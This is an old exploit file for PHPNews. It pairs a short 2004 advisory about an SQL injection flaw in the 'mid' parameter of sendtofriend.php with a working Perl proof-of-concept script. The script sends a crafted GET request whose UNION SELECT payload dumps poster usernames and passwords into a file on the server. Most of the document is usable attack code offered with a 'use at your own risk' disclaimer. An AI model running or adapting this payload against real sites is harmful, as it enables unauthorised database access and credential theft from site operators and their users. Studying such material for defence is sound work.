phpnews.txt

`SQL Injection vulnerability in PHPNews  
  
11/25/2004  
  
Description:  
A vulnerability has been reported in PHPNews, which can be exploited  
by malicious people to conduct SQL injection attacks  
Input passed to the "mid" parameter in "sendtofriendphp"  
is not properly sanitised before being used in a SQL query This can  
be exploited to manipulate SQL queries by injecting arbitrary SQL code  
The vulnerability has been reported in version 123 Other versions may  
also be affected  
  
Provided and/or discovered by:  
Reported by vendor  
  
http://secunia.com/advisories/13300/   
  
simple exploit-test written by ruggine  
  
[email protected]  
  
n.b. Use at your own risk! :P  
  
--------------------------------- snip here  
#!/usr/bin/perl -w  
  
use Socket;  
unless (@ARGV > 2) { die "usage: $0 mid_number /path_to_phpnews/ ip_host\n".   
"f.e. phpnews 1 /phpnews/ 192.168.0.1\n"};  
my $mid_number = $ARGV[0];  
my $path_to_phpnews = $ARGV[1];  
my $host = $ARGV[2];  
my $port = 80;  
my $EOL = "\015\012";  
  
my $inj = "%20union%20select%20username,password%20from%20phpnews_posters%20into%20outfile%20'/tmp/ghghgh'";  
  
my $packet = "GET " . $path_to_phpnews . "sendtofriend.php?mid=" . $mid_number . $inj . " HTTP/1.0" . $EOL. $EOL;  
  
my $protocol = getprotobyname('tcp');  
  
my $iaddr = inet_aton($host);  
my $paddr = sockaddr_in($port,$iaddr);  
  
socket(SOCKET,PF_INET,SOCK_STREAM,$protocol) or die "no socket :-(";  
connect(SOCKET,$paddr) or die "no connect :-(";   
send(SOCKET,$packet,0) or die "no send :-(";  
@lines = <SOCKET>;  
print @lines;  
close SOCKET or die "no close :-(";   
-------------------------------------------end snip`